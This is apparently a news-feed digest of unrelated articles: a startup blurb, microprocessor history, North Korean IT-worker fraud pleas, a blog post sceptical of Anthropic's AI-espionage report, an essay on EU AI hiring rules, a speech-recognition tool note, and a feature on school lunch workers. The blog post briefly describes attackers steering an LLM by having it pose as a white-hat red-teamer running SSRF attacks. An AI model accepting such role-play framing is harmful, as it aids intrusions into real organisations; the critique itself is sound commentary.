Our team (ex. MIT, Tsinghua, JITX (YCS18), University of Toronto) has been building smart glasses for over 6 years.

The hardware was never ready, but breakthroughs in micro-optoelectronics have given us lightweight, all-day wearable smart glasses and put us on the precipice of the next personal computing revolution.

But the software still sucks. The apps still suck.

We're building MentraOS to change that. It's a fully open source operating system for smart glasses that unlocks this new interface for devs and brings their apps into the hands (and on the faces) of users.

This is not another B2B SaaS. We're going to eat Apple and Google's lunch. Help us architect the OS for the next personal computer.

Mentra

Founded: 2024

Batch: W25

Team Size: 12

Status: Active

Location: San Francisco


First Microprocessor – 50th Anniversary 2020

Hacker News
firstmicroprocessor.com
2025-11-14 20:53:28
Comments...
Original Article

The World's First Microprocessor was designed and developed from 1968-1970. This site describes the design work for a MOS-LSI, highly integrated, microprocessor chip set designed starting June 1968 and completed by June 1970. This highly integrated computer chip set was designed for the US Navy F14A “TomCat” fighter jet by Mr. Steve Geller and Mr. Ray Holt as part of a design team while working for Garrett AiResearch Corp under contract from Grumman Aircraft, the prime contractor for the US Navy. The MOS-LSI chips, called the MP944, were manufactured by American Microsystems, Inc of Santa Clara, California.

The MOS-LSI chip set was part of the Central Air Data Computer (CADC), which had the function of controlling the moving surfaces of the aircraft and displaying pilot information. The CADC received input from five sources: a static pressure sensor, a dynamic pressure sensor, analog pilot information, a temperature probe, and digital switch pilot input. The output of the CADC controlled the moving surfaces of the aircraft. These were the wings, maneuver flaps, and the glove vane controls. The CADC also controlled four cockpit displays for Mach Speed, Altitude, Air Speed, and Vertical Speed. The CADC was a redundant system with real-time self-testing built in. Any single failure in one system would switch operation over to the other.

Two state-of-the-art quartz sensors, a 16-bit high precision analog-to-digital converter, a 16-bit high precision digital-to-analog converter, the MOS-LSI chip set, and a very efficient power unit made up the complete CADC. A team of over 25 managers, engineers, programmers, and technicians from AiResearch and American Microsystems labored for two years to accomplish a design feat never before attempted, a complete state-of-the-art, highly integrated, digital air data computer. Previous designs were based around mechanical technology, consisting of precision gears and cams. Standard technology, used commercially for the next five years, designed for the rugged military environment allowed this feat to be accomplished.

In 1971, Mr. Ray Holt wrote a design paper on the MOS-LSI chip set design which was approved for publication by Computer Design magazine. However, because of national security reasons the U.S. Navy would not approve this paper for publication. Mr. Holt attempted again in 1985 to have the paper cleared and the answer again was no. Finally, in April 1997, he started the process again and this time was able to receive clearance for publication as of April 21, 1998.

The entire contents of this original 1971 paper, “Architecture Of A Microprocessor“, is made available here. The first public announcement of the F14A MOS-LSI microprocessor chip set was a published article by the Wall Street Journal on September 22, 1998. This paper and the details of the design were first presented publicly by Mr. Ray Holt at the Vintage Computer Festival held at the Santa Clara Convention Center on September 26-27, 1998.

For those historians who like claims, I respectfully submit the following claims for the F14 MP944 microprocessor:

1st microprocessor chip set

1st aerospace microprocessor

1st fly-by-wire flight computer

1st military microprocessor

1st production microprocessor

1st fully integrated chip set microprocessor

1st 20-bit microprocessor

1st microprocessor with built-in programmed self-test and redundancy

1st microprocessor in a digital signal (DSP) application

1st microprocessor with execution pipeline

1st microprocessor with parallel processing

1st microprocessor with integrated math co-processors

1st Read-Only Memory (ROM) with a built-in counter

Five plead guilty to helping North Koreans infiltrate US firms

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 20:11:26
The U.S. Department of Justice announced that five individuals pleaded guilty to aiding North Korea's illicit revenue generation schemes, including remote IT worker fraud and cryptocurrency theft. [...]...
Original Article

North Korean actor

The U.S. Department of Justice announced that five individuals pleaded guilty to aiding North Korea’s illicit revenue generation schemes, including remote IT worker fraud and cryptocurrency theft.

As part of this, the U.S. authorities announced actions seeking the forfeiture of $15 million in cryptocurrency from heists carried out by the APT38 threat group, which is linked to the Lazarus hacking group.

The facilitators, four Americans and one Ukrainian, used their own, false, or stolen (from 18 U.S. persons) identities to make it possible for DPRK agents to be hired by American firms for remote work.

The latter then funneled their salaries, and in some cases stolen data, to the North Korean government.

According to the DOJ’s announcement , the actions of the five individuals affected 136 companies nationwide and generated over $2.2 million in revenue for the DPRK regime.

The five people who pleaded guilty are:

  • Oleksandr Didenko – Pleaded guilty to wire-fraud conspiracy and aggravated identity theft. He stole U.S. identities and sold them to overseas IT workers, who got employment at 40 U.S. companies. Previously linked to the UpWorkSell platform (seized by the DOJ), and identified as a co-conspirator of Christina Marie Chapman .
  • Erick Ntekereze Prince – Pleaded guilty to wire-fraud conspiracy. Through his company, Taggcar Inc., he placed overseas IT workers using stolen identities at 64 U.S. companies, earning $89,000 in the process, and causing damages exceeding $943,000.
  • Audricus Phagnasay , Jason Salazar , and Alexander Paul Travis pleaded guilty to wire-fraud conspiracy. They participated in the said schemes between 2019 and 2022, causing damages totaling $1.28 million. Travis earned $51,000, while Phagnasay and Salazar earned between $3,450 and $4,500.

Didenko agreed to forfeit $570,000 in fiat currency and an additional $830,000 worth of cryptocurrency.

The DOJ announcement also highlights two civil forfeiture complaints filed to seize amounts totaling over $15 million, which were stolen and laundered by North Korea’s APT38.

The seized funds relate to four major incidents from 2023 targeting cryptocurrency exchange platforms based in Panama, Estonia, and Seychelles. In total, $382 million was stolen in these cyber-heists.

APT38 has been laundering funds from these hacks via cryptocurrency bridges, mixers, exchanges, and OTC traders, and authorities have so far traced and seized $15 million, with work to intercept more underway.


Houston, We Have a Problem: Anthropic Rides an Artificial Wave – BIML

Hacker News
berryvilleiml.com
2025-11-14 20:06:31
Comments...
Original Article

I’ll tip my hat to the new Constitution
Take a bow for the new revolution
Smile and grin at the change all around
Pick up my guitar and play
Just like yesterday
Then I’ll get on my knees and pray
We don’t get fooled again

Out there in the smoking rubble of the fourth estate, it is hard enough to cover cyber cyber. Imagine, then, piling on the AI bullshit. Can anybody cut through the haze? Apparently for the WSJ and the NY Times , the answer is no.

Yeah, it’s Anthropic again. This time writing a blog-post level document titled “ Disrupting the first reported AI-orchestrated cyber espionage campaign ” and getting the major tech press all wound around the axle about it.

The root of the problem here is that expertise in cyber cyber is rare AND expertise in AI/ML is rare…but expertise in both fields? Not only is it rare, but like hydrogen-7, which has a half-life of about 10^-24 seconds, it disappears pretty fast as both fields progress. Even superstar tech reporters can’t keep everything straight.

Let’s start with the end. What question should the press have asked Anthropic about their latest security story? How about, “which parts of these attacks could ONLY be accomplished with agentic AI?” From our little perch at BIML, it looks like the answer is a resounding none.

Now that we know the ending, let’s look at both sides of the beginning. Security first. Unfortunately, brute force, cloud-scale, turnkey software exploit is what has been driving the ransomware cybercrime wave for at least a decade now. All of the offensive security tool technology used by the attackers Anthropic describes is available as open source frameworks, leading experts like Kevin Beaumont to label the whole thing, “vibe usage of open source attack frameworks.” Would existing controls work against this? Apparently not for “a handful” of the thirty companies Anthropic claims were successfully attacked. LOL.

By now those of us old enough to know better than to call ourselves security experts have learned how to approach claims like the ones Anthropic is making skeptically. “Show me the logs,” we yell as we shake our canes in the air. Seriously. Where is the actual evidence? Who has seen it? Do we credulously repeat whatever security vendors tell us as if it is the gods’ honest truth? No we do not. Who was successfully attacked? Did the reporters chase them down? Who was on the list of 30?

AI second. It is all too easy to exaggerate claims in today’s superheated AI universe. One of the most trivial (and intellectually lazy) ways to do this is to use anthropomorphic language when we are describing what LLMs do. LLMs don’t “think” or “believe” or “have intentionality” like humans do. (FWIW, Anthropic is very much guilty of this and they are not getting any better.) LLMs do do a great job of role playing though. So dressing one up as a black hat nation state hacker and sending it lumbering off into the klieg lights is easy.

So who did it? How do we prove that beyond a reasonable doubt? Hilariously, the real attacks here appear to be asking an LLM to pretend to be a white hat red team member dressed in a Where’s Waldo shirt and wielding an SSRF attack. Wake me up when it’s over.

Ultimately, is this really the “first documented case of a cyberattack largely executed without human intervention at scale”…no, that was the script kiddies in the ’90s.

Let’s be extremely clear here. Machine Learning Security is absolutely critical. We have lots of work to do. So let’s ground ourselves in reality and get to it.

Europe Is Regulating AI Hiring. Why Isn’t America?

Portside
portside.org
2025-11-14 20:00:38
Europe Is Regulating AI Hiring. Why Isn’t America? Maureen Fri, 11/14/2025 - 15:00 ...
Original Article

In 2018, Amazon unveiled a groundbreaking AI hiring tool. But what began as a promise to revolutionize how the company identified talent devolved into an algorithm that “did not like women.” The model, trained on a decade of old resumes mostly from men, penalized references to women’s organizations and graduates of women’s colleges. Although Amazon abandoned the tool, the incident revealed a more fundamental problem: In automating hiring, employers are also automating bias. Today, AI plays a major role in hiring, yet the U.S. has failed to establish coherent guardrails even as jurisdictions like the European Union have acted decisively. To better protect workers, the U.S. should follow Europe’s lead in codifying fairness and transparency into AI-driven hiring.

AI is no longer experimental but ubiquitous. 87 percent of companies now use AI at some stage of the hiring process. Many start by deploying algorithms that use data from past “successful hires” to target job ads towards people with similar profiles, thereby favoring candidates who mirror the existing workforce and perpetuating its makeup. AI tools then screen candidates by extracting data from resumes and ranking them, again relying on historical patterns to predict who is likely to succeed. Some systems go further, using AI-powered video interviews that analyze “non-verbal cues, communication style, professionalism, and listening” to assess candidates’ interpersonal skills — criteria that can disadvantage candidates with cultural backgrounds outside the model’s norm. In many cases, applicants are screened out before ever reaching a human reviewer, leaving AI tools to exert significant yet invisible influence over the hiring process.

Recent lawsuits and enforcement actions mark the first wave of legal challenges testing how existing anti-discrimination laws apply to AI-driven hiring systems. In EEOC v. iTutorGroup , the Equal Employment Opportunity Commission brought its first publicly known AI-bias enforcement action, alleging that iTutorGroup’s software automatically rejected female applicants aged 55 or older and male applicants aged 60 or older, without human review. In August 2023, the company agreed to pay $365,000 to settle the claims. In Mobley v. Workday , a federal court allowed age discrimination claims to proceed on the theory that Workday’s AI software could act as an “agent” of employers who delegate hiring functions to it. The decision signaled that AI hiring vendors could face direct liability—a move that could prevent developers from offloading responsibility for discrimination onto employers.

Several additional cases are in early stages of litigation. In Harper v. Sirius XM Radio , a job seeker alleged that an AI-powered hiring system unfairly downgraded his applications by relying on proxies like education, zip code, and work history that disproportionately disadvantage Black candidates. And in ACLU v. Aon Consulting , the ACLU filed complaints with the FTC and EEOC alleging that Aon’s “personality” assessment test and automated video interviewing tool, which were marketed as “bias-free,” screened out racial minorities and people with disabilities at disproportionate rates. Together, these actions suggest that while existing anti-discrimination statutes can reach algorithmic bias, such claims remain rare relative to AI’s widespread use.

U.S. policymakers have yet to respond coherently. With Congress silent, some states and cities have stepped in to fill the gap. New York City’s Local Law 144, for instance, mandates annual bias audits and disclosure for employers using AI tools. California requires employers to keep four years of decision-making data from AI systems and to provide 30 days’ notice when AI systems are used in hiring—measures designed to facilitate worker complaints and investigations. These laws push in the right direction but remain a geographic patchwork, leaving most workers without protection.

Europe, by contrast, has acted decisively. In 2024, the European Union passed the Artificial Intelligence Act , a landmark law that classifies any AI software used in hiring as “high-risk.” That designation triggers stringent obligations for both the developers who build these systems and the employers who deploy them.

Under the EU’s law, developers bear the heaviest responsibilities. They must test their models, identify any disparate outcomes, and ensure that training data are “relevant, sufficiently representative and . . . free of errors,” preventing the replication of historical bias. They must also document how their algorithms were built and the data sources they rely on, so that regulators can audit models suspected of producing discriminatory results. If they become “aware of the risk” that a system is unfair, they must “immediately investigate the causes” and take “necessary corrective actions,” including retraining or recalling the model. These requirements establish fairness as a precondition for participating in the European market.

Once AI technologies are on the market, employers share responsibility for their use. The Act requires employers to maintain detailed “logs automatically generated by the system,” recording every instance of an AI tool’s use. These logs create an audit trail, enabling regulators and rejected applicants to reconstruct hiring decisions and test for discriminatory outcomes. Employers must also provide human oversight. AI systems must be overseen by “at least two natural persons with the necessary competence, training and authority” who can “properly interpret” the system’s output and intervene if outcomes appear biased or unreliable. In these cases, the model must be retrained or withdrawn entirely.

Beyond defining obligations, the Act also provides for enforcement. Each EU member state is required to designate a single national supervisory authority responsible for monitoring compliance, while the newly-established European Artificial Intelligence Board coordinates oversight across the bloc. Moreover, developers are required to affix a “CE marking,” a certification label that signals compliance with EU standards to business customers.

Most importantly, the Act has real teeth. Developers and employers who fail to “take the necessary corrective actions” can be fined up to €35 million or 7 percent of global annual revenue. The Act also operates in tandem with the General Data Protection Regulation, which guarantees individuals the right “not to be subject to a decision based solely on automated processing.” In practice, this allows job applicants to ask companies how an algorithm affected their outcome and request a human re-evaluation, creating accountability that U.S. law currently lacks. Ultimately, the Act forms the world’s most comprehensive framework of algorithmic governance, combining ex ante rules demanding fairness before deployment, and ex post rights letting individuals challenge unfair results.

Although researchers have not yet been able to assess the Act’s impact given its recency — it is in partial effect and is slated to enter full effect in August 2026 — its influence is already visible. The StepStone Group, a major online jobs platform, publicly audited its AI recommendation engine for bias — an effort praised by legal experts as a model for responsible compliance — while TechWolf, a Belgium-based HR tech firm, described the law as a way to “manage risks explicitly and safeguard fairness and transparency.” Other major companies, like Amazon, Microsoft, and OpenAI, have also voiced support for the Act as a whole.

Adopting a comprehensive regulatory regime in the U.S. for AI-assisted hiring will not be easy. Debates will likely ensue over how to balance innovation with regulation and preserve competitiveness. Given the current political climate, federal action in the U.S. may be infeasible, so states should lead the way. Still, to ensure that workplaces are environments free from discrimination, where employment rewards ability rather than entrenches bias, American policymakers must act with urgency and resolve.

parakeet-mlx

Simon Willison
simonwillison.net
2025-11-14 20:00:32
parakeet-mlx Neat MLX project by Senstella bringing NVIDIA's Parakeet ASR (Automatic Speech Recognition, like Whisper) model to to Apple's MLX framework. It's packaged as a Python CLI tool, so you can run it like this: uvx parakeet-mlx default_tc.mp3 The first time I ran this it downloaded a 2.5GB ...
Original Article

parakeet-mlx. Neat MLX project by Senstella bringing NVIDIA's Parakeet ASR (Automatic Speech Recognition, like Whisper) model to Apple's MLX framework.

It's packaged as a Python CLI tool, so you can run it like this:

uvx parakeet-mlx default_tc.mp3

The first time I ran this it downloaded a 2.5GB model file.

Once that was fetched it took 53 seconds to transcribe a 65MB 1hr 1m 28s podcast episode ( this one ) and produced this default_tc.srt file with a timestamped transcript of the audio I fed into it. The quality appears to be very high.

All Praise to the Lunch Ladies

Hacker News
bittersoutherner.com
2025-11-14 19:54:58
Comments...
Original Article

Words by Jennifer Justus | Photos by Houston Cofield

Portraits featured in this story were taken at Peabody High School and Trenton Elementary School in Trenton, Tennessee.

Granny won me over with the government cheese. As a child, maybe 4 or 5 years old, when I’d visit her on occasional Sundays in Blue Ridge, Georgia, she’d slice me off a little treat — an orange rectangle from a brown cardboard box in the refrigerator. We would sit around her kitchen table, where she held court with my aunts by telling stories and making plans for canning vegetables. Sometimes the aunts smoked cigarettes, which they’d quickly stamp out when my preacher-grandfather came around the corner. Nevermind that my snack was processed and inexpensive, a generic type of Velveeta. In those days at Granny’s, sitting with my cheese and the grown-ups in our rural mountain town, I might as well have been tasting Camembert on the banks of the Seine.

Nevermind, too, the Mason jars of homemade soup on her shelves, a kaleidoscope of summer’s bounty — tomatoes, okra, corn — put up and waiting to take the chill off colder days. Nevermind the freshly baked pound cakes under Tupperware domes like trophies, which she kept atop the washing machine, also in the kitchen, or the biscuits she could whip up with nary a measuring device or recipe. I would learn to appreciate all those later. As a kid, the cheese wowed me.

My mother tried to explain that it was a commodity provided by government funding for the school cafeteria where my grandmother worked. “Maybe you shouldn’t mention the cheese,” Mom said recently, when I told her about writing this story. She has a good point. Folks don’t like to hear the words processed and school food in the same sentence. And Mom wouldn’t want people to think Granny was somehow taking advantage of the system. But don’t worry, Mom. The cheese is part of the point. I want people to know how Granny believed in wasting nothing, in sharing everything. In cooking from scratch as often as possible but also making do with every resource provided to her. And, yes, she sometimes had leftover cheese at home, but she also got in trouble for sneaking extra food into the paper sacks of kids without lunch money or even handing food out the back of the lunchroom screen door. “Situational ethics,” my cousin Susie calls it. I’d come to understand all that later. But as a kid, I just knew Granny’s job was cool.

Beulah Culpepper, the writer’s grandmother, was married to Rev. Paul Culpepper and spent her early years at home in the Georgia mountains, taking care of their eight children. At age 43, she began her food service career at Blue Ridge Elementary where, for about three decades, she found a sort of ministry of her own — making sure kids were well fed.

Beulah Culpepper started work as an assistant lunch lady at Blue Ridge Elementary School in 1950 at age 43. That’s after she’d had eight kids of her own, whom she raised by home cooking, pickling, canning, and keeping chickens. She married young, after a rough childhood. My grandparents held a small ceremony on the railroad tracks outside the textile plant where they’d met. My grandfather called her Sunshine. And, for the outsized proportion of his noggin, she called him Fathead. She never learned to drive, and she only had a third-grade education. But when my father, her youngest, started school, she decided she was going with him. “We walked to school together every morning,” Dad told me.

She worked her way to manager at the cafeteria, retiring in the early 1980s. Over the course of her tenure, her education level sometimes couldn’t keep up with her natural-born smarts, so she’d ask for my aunt’s help on the weekends to work out the financial parts of her menus. She became known for her vegetable soups, yeast rolls, and peanut butter cookies.

Mom remembers Granny’s frustration as, over time, guidelines and budgets added complicated layers to the work and hampered the scratch cooking she preferred. The government cheese went into big batches of creamy macaroni served alongside crisp, fried fish and scoops of turnip greens. She’d sneak in bacon grease from home to flavor green beans. Sadly, her own savory cornbread eventually gave way to a quicker and sweeter mix at school. My cousin Margaret remembers a student asking her: “Mrs. Culpepper, is this cornbread — or just bad cake?”

County employees would sometimes join the students for lunch as if she were running a restaurant. “She had a name county-wide for the meals she served,” says Gene Crawford, a columnist for the local newspaper who taught at the school in the 1970s.

Sheila Robinson (age 56; 7 years in the cafeteria; from St. Louis, Missouri)

Dad remembers when the lunchroom was just an old clapboard structure with wooden floors. Students who brought their lunch, often because they couldn’t afford the cafeteria meal, sat on benches along the perimeter. Granny tried to be discreet in making sure those kids had plenty. “What have you got to eat today?” Dad remembers her asking, peeking into their bags and sometimes finding nothing but a leftover biscuit. “She would give them anything she could get her hands on,” he says. She left out extra bowls of grits and gravy or commodity foods for students to share. At least once, the principal scolded her for giving away food for free. “Do I make money for this lunchroom?” she asked him. Yes. “Do I lose money for this lunchroom?” No. “Well, don’t you ever get on to me again for giving those kids food,” my mother remembers Granny recounting. “No kid will ever leave this lunchroom hungry.”

But before we go too far: a warning. If you’re looking for a dreamy, idyllic grandma story where I stand at her elbow and learn recipes, this ain’t it. I somehow don’t have a single recipe from Granny, even if she was the best cook I’ve ever known. But I did learn plenty else from her and felt her love in different ways. I’d sometimes sit with her and her dogs Tico or George while she chewed tobacco and watched Braves games. I remember her feisty attitude, stout build, and strong hands. She would squeeze my upper arms every time I entered her kitchen and compliment me on weight gain (a confusing but comforting message for a teen girl). It took me years to realize how she’d influenced my life as a food writer.

In reflecting on her now, I wanted to check in with modern-day heroes of the school lunch line. Even as it feels like our social safety nets are crumbling, I see in these workers a sharp stewardship of resources, a special sort of hospitality, and — despite government red tape and political divides — a deep commitment to community care.

Lisa Stoneburner (age 61; 8 years in the cafeteria; from Trenton)

Zhanae Box “I like to add my own touch to the recipes.” (age 31; 2 years in the cafeteria; from Jackson, Tennessee)

Stephanie Dillard at Enterprise City Schools in South Alabama likes to sit down for lunch with the kids and hear their thoughts on the food. She’s a longtime board member and newly elected president of the School Nutrition Association, a nonprofit organization of more than 50,000 lunch ladies (and fellas) and others interested in school nutrition. But day to day, you’ll find Dillard filling in for kitchen staff, crunching budget numbers, and working to get fresh, locally grown foods onto kids’ plates. Last year that meant satsumas from a neighboring county to serve with roasted chicken and broccoli. It meant local strawberries and even a special shrimp bowl with the region’s beloved Conecuh sausage.

“The greatest joy is just knowing that we are feeding children healthy meals. So many families rely on us daily,” Dillard says. “I just want to continue to see that all children have equal access to the meals.”

But Dillard is clear about the challenges. “Number one, we need more funding, so we can increase scratch cooking and more farm-to-school programs,” she says. “With the MAHA movement, they’re pushing, obviously, more scratch cooking, and that’s great and grand. I have no problem with less processed foods in schools, but we need the funding to be able to support it.”

To be sure, the stew of school food has long been mixed with politics and money. The National School Lunch Act, which passed in 1946, four years before my grandmother started cafeteria work, had its roots in an ecosystem of competing interests, says Marcus Weaver-Hightower, author of Unpacking School Lunch: Understanding the Hidden Politics of School Food . Over the years, politicians have argued over funding cuts, regulations, and what makes food healthy — along with who gets to set the menu.

Of late, Health and Human Services Secretary Robert F. Kennedy Jr. seems to champion some of the healthier standards that conservatives once criticized, and partly rolled back, when the same ideas were espoused by then-First Lady Michelle Obama’s Healthy, Hunger-Free Kids Act campaign. (The opening lines of a 2014 Heritage Foundation article: “Michelle Obama thinks she knows what your children should eat.”)

Kennedy has advocated for healthier school food even as the Trump administration has cut millions in funding that would help make that possible, including eliminating the Local Food for Schools Cooperative Agreement Program and Patrick Leahy Farm to School Grants.

Deloris Morgan “The babies make you feel young.” (age 63; 8 years in the cafeteria; from Trenton)

Caryn Needham “I love seeing the children every day.” (age 44; 4 years in the cafeteria; came to Trenton from California)

Samantha Goyret and Caroline Ideus, co-directors of the Northwest Tennessee Local Food Network, had a statewide farm-to-school plan ready to implement — at least until the funding was cut.

Goyret and Ideus, who produce a guide to local farmers and producers and manage a West Tennessee farmers market, began serving as vital liaisons between farmers and school nutrition directors several years ago. They knew both groups were overworked, with little time to make connections. Goyret and Ideus also helped arrange transportation and delivery. Local farmers earned market values for their products while schools amped up nutrition in ways that appealed to kids. “It’s like, OK, we’re finally finding solutions to these problems ,” Goyret says. “Then the government’s like, No, we’re not going to fund you anymore. So, good luck. Just try to figure it out on your own .”

Lisa Seiber-Garland, school nutrition director for the Trenton Special School District in Trenton, Tennessee, says students loved items like local butter lettuce and purple hull peas obtained through a federal grant. She learned that at least one student convinced her mother to visit a nearby farm for the tender leaves she had tasted atop her school burger. “It was so cool,” Seiber-Garland says. “Grants like that provide access for kids to have things they wouldn’t normally have. With that grant, we were also able to provide fresh ground beef. … We’re still doing it, but not to the extent with the grant. It was such a blessing I didn’t want to stop. I told my farmers I will do what I can to still buy. One had planted his strawberries and his watermelons and everything to meet what we needed in the school for that year. And then we lost the grant.”

Goyret confirms that, indeed, seeds had been planted, orders had been placed. “With every administration, there’s always changes,” she says. “But what’s different about this administration is that they are taking away already allocated funds — funds allocated by the Congress. That should be 100 percent illegal.”

But, per usual, school nutrition directors are making do.

Lisa Seiber-Garland “They’re gonna be fed. We'll find a way.” (age 60; 20-plus years in the cafeteria; from Trenton)

Pat Morgan (age 67; 5 years in the cafeteria, from Trenton)

Dillard says the federal funding cuts will hurt local farmers in Alabama, but her state offers rebates when she serves Alabama-grown foods. “They direct us and help me find the farmers that have the ability to grow enough for our district,” she says. “So I’m very lucky in that aspect. As soon as we find something new or new farmers willing to grow for us, we jump on that.”

Likewise, in Tennessee, Seiber-Garland works through a different grant specifically for elementary students to provide snacks of fresh fruit and vegetables paired with nutritional education. “The kids are the joy for sure. Watching them and their excitement when there’s something they really like,” she says, of offering students new tastes as well as standbys like peaches, grapes, berries, pepper strips, and carrots. A student’s mother came up to her at the cafeteria and said, “You’re the reason my daughter likes raspberries.”

In 2022, California became the first of a half dozen or so states to offer free school meals to all students, regardless of family income. Dillard supports free meals for all students with an emphatic, “Yes, yes, yes!” Food should not be based on income, she says: “It should be part of the school day. Your transportation is of no charge to students. School books are no charge to students. School lunch should be of no charge to students. … It’s just the right thing to do.”

Still, most schools must provide a mix of fee-based and subsidized free and reduced-price meals. Some communities with high percentages of families on SNAP and enrolled in Medicaid automatically qualify for the USDA’s Community Eligibility Provision, which authorizes free meals for all students in the district. But, as the “Big Beautiful Bill” slashes both SNAP and Medicaid, it will surely reverberate through school lunchrooms too. “It’s going to be a huge burden for a lot of families,” says Weaver-Hightower. “The number of problems I think [free lunches] would solve is a really long list. There’s paperwork, of course. And there’s the shame and stigma that some kids feel. Why would we do that to little 5-year-olds?”

Janet Roach “The kids — that’s what I love about the job.” (age 63; 9 years in the cafeteria; from Trenton)

Through all of the policy changes, the cafeteria has remained the “heart of our schools,” according to acclaimed chef Alice Waters. In 1995 she founded the Edible Schoolyard Project, an international nonprofit dedicated to promoting organic school gardens, kitchens, and cafeterias. Waters’ new book, A School Food Revolution (October 2025) celebrates this beating heart of public education.

Dan Giusti, formerly head chef at world-renowned Noma, is another prominent advocate for school lunches. He left his prestigious role in 2015 to create Brigaid, a company now working with 40 school districts in eight states along with other institutions such as senior centers and prisons.

His team has adopted the pragmatic approach long espoused by the professionals in those settings. “We don’t say, This is the food you should serve , or, You shouldn’t serve this food ,” he explains. “It is their program and it is their community. Who are we to come from the outside to tell them otherwise? So we come in and ask, What are you trying to achieve with your program?

Giusti loves the puzzle — the dynamics and balance of nutrition and taste preference. “I was talking with a food service director, and she uses the statistic that roughly 70 percent of the calories students eat in her district come from the food in the schools. So you have a real responsibility to make sure that food is nutritious. But at the same point you also need to make sure kids want to eat it. … Kids need to eat. Period.”

Giusti stresses that policies need to be backed up with resources. “It’s amazing to talk about removing processed foods, cooking more from scratch. I have a business based off of that,” he says. “It’s also really hard to do. If we’re going to say to School District XYZ, You can’t use these things anymore , then I hope we’re also going to give them money to buy more equipment and train their staff.”

Furthermore, edicts need to take into account the people who have to implement them, Giusti stresses. “Folks who work in the kitchens get caught in the mix,” he says. “You can feel it on them. They’re just waiting for the next initiative. They’ve maybe been working in these schools for 20, 30 years, and they’ve seen so many initiatives come and go, come and go. They’ve seen people come and go. Superintendents come and go. But they’re still there. Doing this work every day.”

Cherie Kelly (age 48; 9 years in the cafeteria; from Ottawa, Illinois)

Similar to my grandmother, Hope North in Murfreesboro, Tennessee, started work at the cafeteria when her son entered school. She’s been in food service ever since, about 27 years. Long enough to see her grandson attend Murfreesboro City Schools, too.

On a recent summer day, she climbed onto a brightly painted old school bus with the words CHOW BUS across its front. Inside, the seats had been reconfigured into booths with tables. About 50 meals sat in cooler bags: penne pasta with tomato-meat sauce, a side of carrots, fruit cups, and milk. The bus was headed for Chariot Pointe Apartments, the first stop of about five that day.

“We meet people where they are,” says Tori Carr, a school employee who was driving a van that followed the bus, which had been converted into a sort of free book store. Its shelves also carry cleaning supplies, pantry items, and simple toys like glow sticks and coloring pages.

North’s cousin Keith Sneed drives the Chow Bus as well as regular bus routes during the school year. The two make a good team — tough and tender. They run their route every day in the summer heat, bus windows down. North keeps tabs on her people at each stop. She knows their stories and worries. And if they don’t show up for a few days, she’ll be on the case.

They’d hardly parked at their first location, when a young man in a yellow T-shirt approached the bus. Sneed poked his head out the window. “Man, go get a book!” he said. “You ain’t read a book all summer.” The boy couldn’t help but oblige. Book in hand, he got a fist bump from Sneed as he climbed up the steps for a meal.

“It’s not just about the food,” Sneed explained later. “All they want is for you to listen to them.” But, of course, food is important, too. Not all schools can serve summer meals, which leaves many students at risk. And while this school used to have three Chow buses, funded by a USDA grant, they’re now down to one. “If we lose this bus,” Sneed says, “people will be hungry.”

Cathy Hill ( age 62; 2 years in the cafeteria; from Humboldt, Tennessee, but moved to Trenton)

Carolyn White “The kids keep me active.” (age 64; 4 years in the cafeteria; came here from California)

Today, my grandmother’s town of Blue Ridge is surrounded by million-dollar vacation homes, its downtown sidewalks lined with art galleries and outfitters selling $6,000 bamboo fly rods. The economic disparity between visitors and full-time residents is vast. Fannin County schools qualify for the Community Eligibility Provision, which allows free meals for all — at least for now.

Martha Williams, who works as director of nutrition and wellness in Fannin County School District, grew up here and originally returned to teach math. But a cafeteria lunch lady inspired Williams to work in school nutrition when she pulled the teacher aside and pointed out a student who seemed disheveled and kept wearing the same clothes. Williams recognized the insights that can be gleaned from the serving line and how the work goes beyond keeping kids fed to providing stability, routine, and community care.

Williams points to another inspiration, GiGi Thomas, 63, who has worked in school food service for more than two decades. These days one of her duties is serving cookies, kept in an ancient warmer that “probably came over on the Mayflower,” Thomas says with a laugh. She hands students freshly baked cookies on napkins. “I see these kids every day,” she says. Some of them like chocolate chip cookies, others prefer sugar cookies. “It tickles them to death that I kind of remember what they get.”

In 2023, her cookies were featured in the high school seniors’ graduation video. “If you don’t have the cookies, those kids are devastated,” Thomas says. “That’s all you wanna do is take care of the kids.”

Over in West Tennessee, Seiber-Garland says she sometimes feels like she has 1,400 kids of her own. If no one shows up for a student on grandparents’ day, she fills in. And she loves running into students outside school, where they’re excited to say, “There’s my lunch lady!” Alumni sometimes share photos of their kids. “They’re so special. Every one of them.”

Over her 22 years in the business, Seiber-Garland has served her mother’s recipe for poppyseed chicken as well as old favorites like chicken tetrazzini and spaghetti. “I’ve always said, I want this to be their cafe . I can’t control what goes on at night. But for two-thirds or three-fourths of the day, I can. And I want them to be fed and happy, well, and blessed. They bless me.”

She tells of a student who kept trying to save her meal to carry home, because she didn’t have anything to eat there. Seiber-Garland and her staff found a way to provide her with a second meal for the evening. “I also had a parent come tell me to not let her child eat. And I’m like, No ma’am. If she asks to eat in my line, I’m gonna feed her.

Seiber-Garland says there are people who donate every year to help pay off lunch balances that have remained unpaid. Recently, she created a “share table” on a red cart with a donated Yeti cooler that helps teach kids about reducing food waste. It’s where students can leave unopened milks or whole food that they don’t want for their classmates to enjoy. She’s also been known to cover lunches out of her own pocket, and her staff has taken up collections, too. “They’re gonna be fed,” she says. “We’ll find a way.”

I hear in those words the resourcefulness and care of my own grandmother and a guiding phrase she taught my father in standing up for what you believe.

As Granny would say, “You take your part.”  ◊

Jennifer Justus is a writer based in Atlanta, Georgia, and St. Petersburg, Florida. She is an editor at Wildsam and author of Nashville Eats (Abrams). Her work has been published in two editions of Cornbread Nation: The Best of Southern Food Writing, a publication of the Southern Foodways Alliance, and she has received national awards from the Society of Features Journalism, Society of Professional Journalists, and the Association of Food Journalists. Jennifer graduated from the University of Tennessee followed by Boston University where she created her own food writing curriculum with courses in journalism and the masters program in gastronomy, which was founded by Julia Child and Jacques Pepin, and focuses on the cultural study of food. She worked for six years as food culture reporter and features writer at The Tennessean newspaper before embarking on a freelance career that led to work in TIME, Rolling Stone Country, Southern Living, Garden & Gun and more. Jennifer is co-founder of the recipe storytelling project Dirty Pages . The project's first exhibit lives in the permanent collection of the Southern Food & Beverage Museum in New Orleans. She was born in the mountains of Blairsville, Georgia near the start of the Appalachian Trail, which might explain her love for soup beans and cornbread.

Houston Cofield is a photographer based in Memphis, Tennessee. His work explores mythology, fiction, and folklore that embody the American South.

Top Photo: Peggy Davis “I’ve been working here off and on since 1975 — and still here.” (age 69; 50 years in the cafeteria; from Trenton, Tennessee)

